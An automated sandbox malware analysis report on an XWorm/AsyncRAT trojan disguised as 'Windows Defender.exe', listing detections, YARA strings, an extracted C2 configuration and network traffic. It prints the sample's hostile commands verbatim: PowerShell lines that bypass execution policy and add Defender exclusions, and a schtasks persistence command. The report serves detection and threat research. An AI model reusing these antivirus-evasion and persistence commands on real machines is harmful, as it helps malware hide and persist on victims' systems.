
Windows Analysis Report
Windows Defender.exe

Overview

General Information

Sample name:Windows Defender.exe
Analysis ID:1528948
MD5:e9ff85404cbd9c9df15e13d0e4b960b1
SHA1:3269c423ebc616270bf713010b3c87976d07d06a
SHA256:576d63bf309d5fb80b9d2683b21b8257d60dd2a8fa4974982d38ebface89fc47
Tags:exegithub-com-fruktoozikuser-JAMESWT_MHT

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Windows Defender.exe (PID: 4144 cmdline: "C:\Users\user\Desktop\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
    • powershell.exe (PID: 5176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1320 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 5832 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 6068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Windows Defender.exe (PID: 884 cmdline: "C:\Users\user\AppData\Local\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
  • Windows Defender.exe (PID: 3532 cmdline: "C:\Users\user\AppData\Local\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
  • Windows Defender.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Local\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
  • Windows Defender.exe (PID: 6552 cmdline: "C:\Users\user\AppData\Local\Windows Defender.exe" MD5: E9FF85404CBD9C9DF15E13D0E4B960B1)
  • cleanup
{"C2 url": ["22.ip.gl.ply.gg"], "Port": "54699", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source | Rule | Description | Author | Strings
Windows Defender.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
Windows Defender.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Windows Defender.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xf6c5:$s6: VirtualBox
  • 0xf623:$s8: Win32_ComputerSystem
  • 0x113b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1144d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11562:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10b4e:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Windows Defender.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
C:\Users\user\AppData\Local\Windows Defender.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Local\Windows Defender.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xf6c5:$s6: VirtualBox
  • 0xf623:$s8: Win32_ComputerSystem
  • 0x113b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1144d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11562:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10b4e:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0x1013d:$s6: VirtualBox
  • 0x1009b:$s8: Win32_ComputerSystem
  • 0x11e28:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x11ec5:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11fda:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x115c6:$cnc4: POST / HTTP/1.1
00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xf4c5:$s6: VirtualBox
  • 0xf423:$s8: Win32_ComputerSystem
  • 0x111b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1124d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11362:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x1094e:$cnc4: POST / HTTP/1.1

Source | Rule | Description | Author | Strings
0.0.Windows Defender.exe.ad0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.0.Windows Defender.exe.ad0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
0.0.Windows Defender.exe.ad0000.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xf6c5:$s6: VirtualBox
  • 0xf623:$s8: Win32_ComputerSystem
  • 0x113b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x1144d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x11562:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x10b4e:$cnc4: POST / HTTP/1.1
0.2.Windows Defender.exe.12ea1a78.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security |
0.2.Windows Defender.exe.12ea1a78.0.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
  • 0xd8c5:$s6: VirtualBox
  • 0xd823:$s8: Win32_ComputerSystem
  • 0xf5b0:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0xf64d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0xf762:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0xed4e:$cnc4: POST / HTTP/1.1

                      System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Windows Defender.exe", ParentImage: C:\Users\user\Desktop\Windows Defender.exe, ParentProcessId: 4144, ParentProcessName: Windows Defender.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', ProcessId: 5176, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Windows Defender.exe", ParentImage: C:\Users\user\Desktop\Windows Defender.exe, ParentProcessId: 4144, ParentProcessName: Windows Defender.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', ProcessId: 5176, ProcessName: powershell.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Users\user\AppData\Local\Windows Defender.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Windows Defender.exe, ProcessId: 4144, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Windows Defender.exe", ParentImage: C:\Users\user\Desktop\Windows Defender.exe, ParentProcessId: 4144, ParentProcessName: Windows Defender.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', ProcessId: 5176, ProcessName: powershell.exe
Source: File created; Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research); Data: EventID: 11, Image: C:\Users\user\Desktop\Windows Defender.exe, ProcessId: 4144, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows Defender.lnk
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Windows Defender.exe", ParentImage: C:\Users\user\Desktop\Windows Defender.exe, ParentProcessId: 4144, ParentProcessName: Windows Defender.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender" /tr "C:\Users\user\AppData\Local\Windows Defender.exe", ProcessId: 5832, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Windows Defender.exe", ParentImage: C:\Users\user\Desktop\Windows Defender.exe, ParentProcessId: 4144, ParentProcessName: Windows Defender.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Windows Defender.exe', ProcessId: 5176, ProcessName: powershell.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T14:03:37.561657+0200 | 2853957 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49989 | 147.185.221.22 | 54699 | TCP


                      AV Detection

Source: Windows Defender.exe; Avira: detected
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Avira: detection malicious, Label: TR/Spy.Gen
Source: 00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Xworm {"C2 url": ["22.ip.gl.ply.gg"], "Port": "54699", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
Source: C:\Users\user\AppData\Local\Windows Defender.exe; ReversingLabs: Detection: 81%
Source: Windows Defender.exe; ReversingLabs: Detection: 81%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Joe Sandbox ML: detected
Source: Windows Defender.exe; Joe Sandbox ML: detected
Source: Windows Defender.exe; String decryptor: 22.ip.gl.ply.gg
Source: Windows Defender.exe; String decryptor: 54699
Source: Windows Defender.exe; String decryptor: 1337
Source: Windows Defender.exe; String decryptor: <Xwormmm>
Source: Windows Defender.exe; String decryptor: Video
Source: Windows Defender.exe; String decryptor: USB.exe
Source: Windows Defender.exe; String decryptor: %LocalAppData%
Source: Windows Defender.exe; String decryptor: Windows Defender.exe
Source: Windows Defender.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Windows Defender.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

Source: Network traffic; Suricata IDS: 2853957 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49989 -> 147.185.221.22:54699
Source: Malware configuration extractor; URLs: 22.ip.gl.ply.gg
Source: Yara match; File source: Windows Defender.exe, type: SAMPLE
Source: Yara match; File source: 0.0.Windows Defender.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: C:\Users\user\AppData\Local\Windows Defender.exe, type: DROPPED
Source: global traffic; TCP traffic: 192.168.2.6:49989 -> 147.185.221.22:54699
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 208.95.112.1
Source: Joe Sandbox View; ASN Name: TUT-ASUS
Source: Joe Sandbox View; ASN Name: SALSGIVERUS
Source: unknown; DNS query: name: ip-api.com
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1, Host: ip-api.com, Connection: Keep-Alive
Source: global traffic; DNS traffic detected: DNS query: ip-api.com
Source: global traffic; DNS traffic detected: DNS query: 22.ip.gl.ply.gg
Source: Windows Defender.exe, Windows Defender.exe.0.dr; String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: powershell.exe, 00000002.00000002.2349671307.000001B0719FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442787413.0000019F9E2DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2588883813.000001851006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2325444475.000001B061BB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.000001850022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Windows Defender.exe, 00000000.00000002.3482001337.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2325444475.000001B061991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.0000018500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.00000253893E1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2325444475.000001B061BB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.000001850022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2355459322.000001B079E70000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.microsoft.cL
Source: powershell.exe, 00000002.00000002.2325444475.000001B061991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2386207783.0000019F8E271000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2487898895.0000018500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2662882198.00000253893E1000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000B.00000002.2662882198.0000025389609000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2349671307.000001B0719FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442787413.0000019F9E2DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2588883813.000001851006D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2810590289.000002539944B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe

                      Operating System Destruction

Source: C:\Users\user\Desktop\Windows Defender.exe; Process information set: 01 00 00 00

                      System Summary

Source: Windows Defender.exe, type: SAMPLE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.Windows Defender.exe.ad0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.Windows Defender.exe.12ea1a78.0.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.Windows Defender.exe.12ea1a78.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3487954673.0000000012EA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.2229425020.0000000000AD2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Windows Defender.exe, type: DROPPED; Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\Windows Defender.exe; Code function: 0_2_00007FFD34696096
Source: C:\Users\user\Desktop\Windows Defender.exe; Code function: 0_2_00007FFD34696E42
Source: C:\Users\user\Desktop\Windows Defender.exe; Code function: 0_2_00007FFD346916E9
Source: C:\Users\user\Desktop\Windows Defender.exe; Code function: 0_2_00007FFD34692361
Source: C:\Users\user\Desktop\Windows Defender.exe; Code function: 0_2_00007FFD346920C1
Source: C:\Users\user\Desktop\Windows Defender.exe; Code function: 0_2_00007FFD3469132B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD3468207D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD34688E4C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD34688EA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD34685EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD34685BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD347539D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 2_2_00007FFD347530E7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_00007FFD3469ACF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_00007FFD34695DFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_00007FFD34695EED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_00007FFD34693FFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_00007FFD34695BF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 5_2_00007FFD347639D1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 9_2_00007FFD34660D7D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 9_2_00007FFD34668E4C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 9_2_00007FFD346621FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 9_2_00007FFD34668EA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 9_2_00007FFD34665BFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 9_2_00007FFD347339D1
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Code function: 18_2_00007FFD346916E9
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Code function: 18_2_00007FFD34690E5E
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Code function: 18_2_00007FFD346920C1
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Code function: 20_2_00007FFD34660E5E
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Code function: 20_2_00007FFD346616E9
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Code function: 20_2_00007FFD346620C1
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Code function: 21_2_00007FFD34680E5E
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Code function: 21_2_00007FFD346816E9
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Code function: 21_2_00007FFD346820C1
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Code function: 22_2_00007FFD346916E9
Source: C:\Users\user\AppData\Local\Windows Defender.exe; Code function: 22_2_00007FFD34690E5E
